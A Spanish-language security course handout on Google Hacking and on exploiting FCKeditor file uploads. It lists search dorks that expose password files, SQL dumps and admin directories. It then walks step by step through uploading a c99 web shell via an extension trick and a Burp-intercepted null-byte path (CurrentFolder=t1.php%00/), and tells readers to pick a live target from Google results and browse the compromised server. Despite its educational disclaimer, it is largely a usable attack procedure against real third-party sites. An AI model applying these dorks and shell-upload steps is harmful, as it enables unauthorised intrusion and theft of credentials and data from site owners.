INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
La información expuesta en este documento es para fines exclusivamente educativos
y debería ser usada a fin de solucionar y prevenir posibles intrusiones
TEMA:
La técnica de FOOTPRINTING usando Google Hacking consiste en explotar la gran capacidad
de almacenamiento de información de Google de tal manera que se realicen búsquedas de
información específicas en del buscador. Si las búsquedas las orientamos a ciertas palabras
clave que nos ayuden a encontrar información sensible, puntos de entrada sensibles a
posibles ataques o a sitios que exponen vulnerabilidades que puedan ser explotados con fines
maliciosos.
1. OBJETIVOS
Aprender los predicados o palabras clave para usar el buscador de google
Explotar una vulnerabilidad encontrada usando el buscador de google
1
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
2. PRINCIPALES OPERADORES Y PALABRAS CLAVE PARA USO DE GOOGLE HACKING
Operadores
Propósito Ejemplo Observaciones
Booleanos
"" busca una expresión literal "tienda de deportes" compara con tienda de deportes
- excluye páginas que incluyan cierto término. corte -ingles compara con corte
OR (ó |) busca páginas que contengan un término u otro arroz OR azucar compara con arroz azucar
Ayuda a encontrar palabras que Google no suele incluir por
+ +la real compara con la real
considerarlas comunes (de, la, y, con,…)
*: Comodín. Utilizado para sustituir una palabra. Suele combinarse con
* "tienda * deportes" "tienda deportes"
el operador de literalidad (" ")
Palabras
Propósito Ejemplo Observaciones
Clave
presenta los resultados en donde estudios aparece en el
intitle busca páginas con ese título. allintitle:estudios
título
presenta los resultados en donde estudios peru aparece en
allintitle busca páginas que solamente tenga ese título en específico. allintitle:estudios peru
el título
presenta los resultados en donde el enlace contiene
inurl busca direcciones en Internet que tengan ese URL. allinurl:estudios peru
estudios peru
busca direcciones en Internet solamente las páginas que tengan ese presenta los resultados en donde el enlace contiene
allinurl inurl:estudios
URL. estudios
ext Busca los archivos que cumplan una determinada extension ext:asa Muestra los archivos publicados con extensión asa.
el ejemplo muestra aquellos resultados para el término
filetype especifica un tipo de extensión de archivo. filetype:pdf usabilidad
usabilidad con extensión pdf
muestra los páginas de los dominios gob.pe donde aparece
site busca un sitio (dominio) específico site:.gob.pe usabilidad
el término usabilidad.
2
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
3. PONIENDO EN PRACTICA
Ejecute estas búsquedas para poner en práctica google hacking
4.1 Búsqueda de Dominios
site: www.microsoft.com
site: microsoft.com –www.microsoft.com
4.2 Listados (Folder Trasversal)
intitle: Index.of/admin
intitle: index.of apache server at
allintitle: "index of/root"
4.3 Páginas por defecto (home page):
intitle:test.page.for.apache "it worked"
allintitle:Netscape FastTrack Server Home Page
intitle:"Welcome to Windows 2000 Internet Services"
intitle:welcome.to.IIS.
allintitle:Welcome to Windows XP Server Internet Services
allintitle:"Welcome to Internet Information Server"
allintitle:Netscape Enterprise Server Home Page
allintitle:Netscape FASTTRACK Server Home Page
4.4 Páginas por defecto:
intitle:test.page.for.apache "it worked"
allintitle:Netscape FastTrack Server Home Page
intitle:"Welcome to Windows 2000 Internet Services"
intitle:welcome.to.IIS.
allintitle:Welcome to Windows XP Server Internet Services
allintitle:"Welcome to Internet Information Server"
allintitle:Netscape Enterprise Server Home Page
allintitle:Netscape FASTTRACK Server Home Page
4.5 Manuales y Documentación
3
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
intitle:"documentation"
intitle:”Apache 1.3 documentation” Apache 1.3
intitle: “Apache 2.0 documentation” Apache
2.0
intitle:”Apache HTTP Server” intitle:” documentation Apache
Various
inurl:cfdocs
ColdFusion
intitle:”Easerver” “Easerver Version Documents” EAServer
inurl:iishelp core
IIS/Various
4.6 Páginas ejemplos
inurl:WebSphereSamples IBM Websphere
inurl:/sample/faqw46 Lotus Domino
4.6
inurl:samples/Search/queryhit Microsoft
Index Server
inurl:siteserver/docs Microsoft Site
Server
inurl:/demo/sql/index.jsp Oracle Demos
inurl:demo/basic/info Oracle JSP
Demos
inurl:iissamples IIS/Various
inurl:/scripts/samples/search IIS/Various
4.6 Escaneo de Puertos
"VNC Desktop" inurl:5800
inurl:5800
inurl:webmin inurl:10000
4.7 Password
ext:pwd inurl:(service | authors | administrators | users) “# -
FrontPage-”
inurl:"auth_user_file.txt"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
alliurl:phpinfo.php
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:sql “# dumping data for table” “`PASSWORD` varchar”
4
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
4.8 Base de Datos
intitle:index.of password.mdb
ext:asa mdb
ext:asa SERVER=(local)
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
filetype:sql “# dumping data for table” “`PASSWORD` varchar”
filetype:inc intext:mysql_connect password -please -could –port
5
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
6
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
4. EXPLOTANDO SITIOS WEB CON FCKEDITOR
La información expuesta en este documento es para fines exclusivamente educativos
y debería ser usada a fin de solucionar y prevenir posibles intrusiones (ETHICAL
HACKING).
5.1 FCKeditor
El FCKEditor es un editor de texto Open Source del tipo WYSIWYG (What you see is what
you get), muy parecido a editores ya conocidos como MS Word o el propio Google Docs.
Lo interesante de este editor es que no necesita instalación alguna en el cliente: se basa
en el servicio HTTP, es decir, a través de un browser, el usuario puede crear y modificar
documentos de texto que luego pueden ser exportados y descargados. Este editor es
compatible con la gran mayoría de navegadores conocidos incluyendo a Internet
Explorer, Firefox, Safari, Opera y Netscape.
FCKeditor se basa en un núcleo escrito en JavaScript, pero, tambíén es implementado
con tecnologías de lado servidor como Asp, Asp.net, Java, PHP, entre otros. Es así que
este editor se convierte en una opción para aquel administrador de red que necesite
implementar este tipo se soluciones en sus organizaciones.
Vulnerabilidad y Escenario
Se asume que un sitio web, http://www.vulnerable.com, tiene instalado el producto
FCKEDITOR FCKeditor la misma que fue instalada por defecto. La vulnerabilidad consiste
emplear la mala configuración de una instalación de FCKeditor. Para ello, se hace uso de
la opción de carga (upload) de archivos de este producto.
7
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
FCKEditor incluye un paquete ‘filemanager’, el cual permite a los desarrollares web incluir
en las aplicaciones que desarrollen un módulo de upload el cual se pone a disposición
de los usuarios finales.
En este caso se puede ubicar la vulnerabilidad con el dork siguiente:
# Dork : inurl:/editor/editor/filemanager/upload/
En el caso de aplicaciones web con PHP, un archivo relevante para explotar esa
vulnerabilidad es el archivo ‘upload.php’o ‘uploadtest.html’, el cual está disponible en la
siguiente localización.
www.vulnerable.com/editor>/editor/filemanager/connectors/php/upload.php
1. Si ejecutan el dork en google les dará el siguiente resultado que devuelve Google
En algún caso google puede detectar el captcha
8
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
2. Seleccione un objetivo y testee
3. Cargar la página que permite ejecutar la vulnerabilidad
http://www.vulnerable123.com/admin/FCKeditor_2.6.4/editor/filemanager/c
onnectors
/uploadtest.html
9
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
4. Determinar el servidor web y posible lenguaje de programación soportado, utilice
netcraft y builthwith
Uno de los datos que es necesario saber es el lenguaje de programación que hay detrás del
servidor vulnerable. La pantalla anterior muestra el siguiente campo
Para identificar cuál parámetro elegir es necesario usar neftcraft
http://toolbar.netcraft.com/site_report?url=http://www.vulnerable123.com
Dicho navegador mostrará un registro similar al siguiente:
10
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
En este caso nos indica que el parámetro a utilizar es PHP
5. Ingresar los parámetros del formulario
Seleccionar de la lista ‘File Uploader’ el element PHP, ‘Resource Type’ el element File y
finalmente ingresa un ‘.txt’ file, en este caso test.txt
6. Presiona el botón de Send to Server, luego del cual siempre y cuando el sitio es vulnerable
se mostrara el siguiente texto.
7. Revisar el archivo que se ingreso
http://www.vulnerable123.com/userfiles/test.txt
11
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
8. Subir Archivos Scripts que permitirían controlar el servidor
A sabiendas que es posible subir al servidor archivos, considerar que se pueden subir archivos
php el cual permitirán la ejecución del comandos en el servidor, si se intenta subir un archivo
php notarán que se muestra la siguiente pantalla
Como se muestra en la imagen, intentamos subir un archivo php al servidor. El motor de
FCKEditor reconoce a esta extensión como no válida y lanza el error "Invalid File". En ese
contexto, para determinar la extensión, lo normal es tomar los caracteres luego del punto
".", sin embrgo, no debemos fiarnos del tipo de archivo sólo por la extensión, debemos tener
en cuenta el tipo de archivo (mime-type), en php podemos usar la sigueinte sentencia para
obtener el tipo de archivo: $_FILES['attachement']['type']
Por ejemplo si deseamos que nuestros usuarios carguen imágenes, entonces primero
debemos permitir sólo las extensiones de imágenes que según nuestras políticas de seguridad
deban ser permitidas. Luego, debemos verificar el mime-type y por último podemos verificar
que sea una imágen válida intentando obtener (mediante código, en tiempo de ejecución)
las dimensiones de la misma.
Es asi que si creamos un archivo con una distinta extensión con un pequeño script en php.
Notemos que la extensión usada fue "php.1":
12
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
La carga de archivos se realizada exitosamente!. Ahora tan sólo tenemos que llamar al archivo
desde el browser. Cómo saber cual es la ruta de subida? Afortunadamente FCKEditor nos
evita la tarea de determinar dónde y lo muestra en "Uploaded File URL".
http://www.vulnerable123.com/userfiles/hello.php.1
Como vemos, el script php fue ejecutado. Esto no siempre funciona, ya el componente
incluyen actualizaciones que mitigan estas vulnerabilidades
MAYORES REFERENCIAS:
Exploiting PHP Upload Module of FCKEditor, Bypassing File-type Check (Anant Kochhar,
Utkarsh Bhatt, Sabyasachi Samanta) - SecurEyes Infusing Security
http://secureyes.net/nw/assets/File-Upload-Vulnerability-in-FCKEditor.pdf
Existen diversas maneras de subir una shell aquí emplearemos el software burpsuite, para
ello configuremos el burp para trabajar con nuestros navegadores
13
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Configuring Firefox to work with Burp
In Firefox, go to the Firefox Menu.
Click on “Preferences” / "Options".
Select the “Advanced” tab followed by the “Network” tab.
In the “Network” tab click on the "Settings" button in the “Connection” section.
14
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Select the "Manual proxy configuration" option.
Enter your Burp Proxy listener address in the "HTTP Proxy" field (by default this is set to 127.0.0.1).
Next enter your Burp Proxy listener port in the "Port" field (by default, 8080).
Make sure the "Use this proxy server for all protocols" box is checked.
Delete anything that appears in the "No proxy for" field.
Now click "OK" to close all of the options dialogs.
Fuente: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-
burp
Configuring Chrome to work with Burp
Note: The Chrome browser picks up the HTTP proxy settings configured on the host computer. By setting
up your computer’s built-in browser (e.g. Internet Explorer on Windows, or Safari on OS X), Chrome will be
automatically configured to work with Burp Suite.
15
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
If you aren't sure where the built-in proxy settings are, open Chrome and go to the Customize menu.
In the Customize menu, select Settings, then click on "Show advanced settings".
In the "Advanced Settings" section, click the "Change proxy settings ..." button. This will open the relevant
configuration options for your host computer.
Now refer to the relevant article (from the links below) for your computer's built-in browser to configure
your proxy settings.
Fuente: https://support.portswigger.net/customer/portal/articles/1783065-configuring-chrome-to-work-with-
burp
16
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Inicie Burp
Click en Next
Click en StartBurp
17
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
18
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Seleccione Proxy y luego options y asegúrese que esta sea la configuración de su proxy
19
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Vamos a ubicar un sitio vulnerable (p.e. www.vulnerable.com) e intentaremos subir la Shell
(p.e. c99.php), lo más seguro es que no podrá le aparecerá el mensaje siguiente:
Para subir el shell vamos a realizar el siguiente procedimiento:
1. Renombrar la Shell c99.php a test.txt
2. En el Burp Suite asegúrese que el “intercept” en el burp esté inactivo (intercept is
off)
3. Ahora desde el sitio vulnerable el elija el archivo prueba.txt
4. Elija, PHP, ASP según sea el tipo de tecnología
20
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
5. En el Burp Suite asegúrese que el “intercept” en el burp esté activo (intercept is on)
6. En el Burpsuite elija proxy y luego intercept y verás esta pantalla
7. Renombrar la cadena del POST de la siguiente manera:
Dice:
/filemanager/connectors/php/upload.php?time=1497572358682&Curren
tFolder=/ HTTP/1.1
21
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
Debe decir
/filemanager/connectors/php/upload.php?time=1497572358682&Curren
tFolder=t1.php%00/ HTTP/1.1
8. Dar clic en el botón de “forward” y luego en “Intercept i son”
9. Le aparecerá la ruta sonde se grabó y saldrá un mensaje de alerta que diga que el
archivo fue cargado sin errores
10. Ud. Puede ingresar a la ruta
www.vulnerable.com/userfiles/t1.php
9. en cuestión, ubicarán una Shell en la que pueden tener prácticamente un manejador de
archivos remoto.
10. Navegue por el servidor, por ejemplo ubíquese en otra carpeta
22
INFORMÁTICA FORENSE, SEGURIDAD DE LA
INFORMACIÓN Y AUDITORIA INFORMÁTICA
NO BORRE NI MODIFIQUE NADA
El único archivo a borrar será el que Ud. Depositó, para ello dar click en el ícono de la casita.
Seleccione el archivo
Y elimine el archivo
11. No haga maldades!!!
23